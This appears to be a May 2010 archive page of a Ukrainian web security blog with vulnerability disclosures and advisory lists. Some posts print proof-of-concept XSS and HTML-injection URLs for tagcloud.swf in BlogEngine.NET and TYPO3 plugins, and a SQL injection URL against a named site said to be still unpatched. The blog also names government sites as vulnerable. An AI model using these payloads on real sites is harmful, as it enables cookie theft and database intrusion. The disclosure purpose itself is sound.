Архів за Травень, 2010

Цікаве чтиво на тему web security

22:48 11.05.2010

Продовжуючи традицію, пропоную вашій увазі цікаві секюріті статті. Щоб ви поповнювали свої знання з веб безпеки.

Добірка цікавого чтива на тему web security (статті з Вікіпедії):

DoS проти PostgreSQL

19:18 11.05.2010

Виявлена можливість проведення DoS атаки проти PostgreSQL.

Уразливі версії: PostgreSQL 8.3.

Відмова через функцію substring() у SQL.

Добірка уразливостей

15:07 11.05.2010

В даній добірці уразливості в веб додатках:

  • New trac-git packages fix code execution (деталі)
  • New trac-git package fixes regression (деталі)
  • OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass (деталі)
  • Cross-Site Scripting (XSS) on CommonSpot server (деталі)
  • Tavanmand Portal (fckeditor) Remote Arbitrary File Upload Vulnerability (деталі)
  • eWebeditor ASP Version Multiple Vulnerabilities (деталі)
  • XSS vulnerability in Drupal’s MP3 Player contributed module (version 6.x-1.0-beta1) (деталі)
  • Joomla (com_gambling) SQL Injection Vulnerabilities (деталі)
  • Security Advisory for Bugzilla 3.0.10, 3.2.5, 3.4.4, and 3.5.2 (деталі)
  • Unauthorized reading confirmation from Outlook (деталі)

Уразливість у віджеті Cumulus для BlogEngine.NET

23:54 10.05.2010

Раніше я вже писав про уразливості в t3m_cumulus_tagcloud для TYPO3. Така ж XSS уразливість є й у віджеті Cumulus для BlogEngine.NET, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

У квітні, 30.04.2010, я знайшов Cross-Site Scripting уразливість у віджеті Cumulus для BlogEngine.NET. Дірку виявив на сайті http://planning.maryland.gov. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/Blog/widgets/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/Blog/widgets/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Уразливі всі версії Cumulus для BlogEngine.NET.

Інфіковані сайти №27

22:44 10.05.2010

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://orthvoldiocese.lutsk.ua - інфекція була виявлена 24.04.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
  • http://yur-gazeta.com - інфекція була виявлена 12.04.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 12 разів протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://strbypass.uz.ua - інфекція була виявлена 05.04.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
  • http://treage.com.ua - інфекція була виявлена 22.03.2010. Зараз сайт не входить до переліку підозрілих.
  • http://orthodoxy.org.ua - інфекція була виявлена 24.04.2010. Зараз сайт не входить до переліку підозрілих.

Як і у випадку з іншими веб сайтами, інфікований сайт yur-gazeta.com також хостить в себе Укртелеком.

Нові сайти для Vulnerable Sites Database

19:21 10.05.2010

Як я вже розповідав, я прийняв участь у проекті Vulnerable Sites Database. І до раніше відправлених їм дірявих сайтів, я вже відправив нові.

Нещодавно я відправив в БД даного проекту 15 сайтів. З них 10 старих дірявих сайтів, про які я вже писав в новинах раніше, та 5 нових уразливих сайтів.

Це діряві gov-сайти: cityofcalapan.gov.ph, www.iea.cyf.gov.pl, www.metinsabancishcek.gov.tr, www.tuzlaram.gov.tr, www.cayirovamuftulugu.gov.tr.

Уразливості на referat.com.ua

15:04 10.05.2010

22.10.2009

У лютому, 16.02.2009, я знайшов SQL Injection, Full path disclosure та SQL DB Structure Extaction уразливості на сайті http://referat.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

10.05.2010

SQL Injection:

http://referat.com.ua/referat_show.php?id=’%20or%20version()%3E4/*

Full path disclosure:

http://referat.com.ua/referat_show.php?id=’

SQL DB Structure Extaction:

http://referat.com.ua/referat_show.php?id=’

Дані уразливості досі не виправлені.

Уразливості в t3m_cumulus_tagcloud для TYPO3

23:51 01.05.2010

Раніше я вже писав про уразливість в Tagcloud для DLE. Така ж уразливість є і в плагіні t3m_cumulus_tagcloud для TYPO3, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Вчора, 30.04.2010, я знайшов Cross-Site Scripting та Full path disclosure уразливості в плагіні t3m_cumulus_tagcloud для TYPO3. Уразливості виявив на сайті http://www.hospitalgranada.gov.co. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/typo3conf/ext/t3m_cumulus_tagcloud/pi1/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/typo3conf/ext/t3m_cumulus_tagcloud/pi1/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Full path disclosure:

http://site/typo3conf/ext/t3m_cumulus_tagcloud/pi1/class.tx_t3mcumulustagcloud_pi1.php

Уразлива версія t3m_cumulus_tagcloud 1.0.

Нові сайти для Vulnerable Sites Database

22:42 01.05.2010

Як я вже розповідав, я прийняв участь у проекті Vulnerable Sites Database. І до раніше відправлених їм дірявих сайтів, я вже відправив нові.

Нещодавно я відправив в БД даного проекту 15 сайтів. З них 5 старих дірявих сайтів, про які я вже писав в новинах раніше, та 10 нових уразливих сайтів.

Це діряві gov-сайти: www.vargemgrandepta.sp.gov.br, www.iga.gov.ba, www.crc.gov.gh, noticias.chubut.gov.ar, www.tribunalconstitucional.gov.bo, www.uesp.gov.co, escuelaslibres.mcye.misiones.gov.ar, www.guayaquil.gov.ec, www.hospitalgranada.gov.co, planning.maryland.gov.

Обхід аутентифікації mod_auth_shadow в Apache

19:21 01.05.2010

Виявлена можливість обходу аутентифікації mod_auth_shadow в Apache.

Уразливі версії: Apache mod_auth_shadow 2.2.

Короткочасні умови дозволяють доступ без перевірки імені користувача і пароля.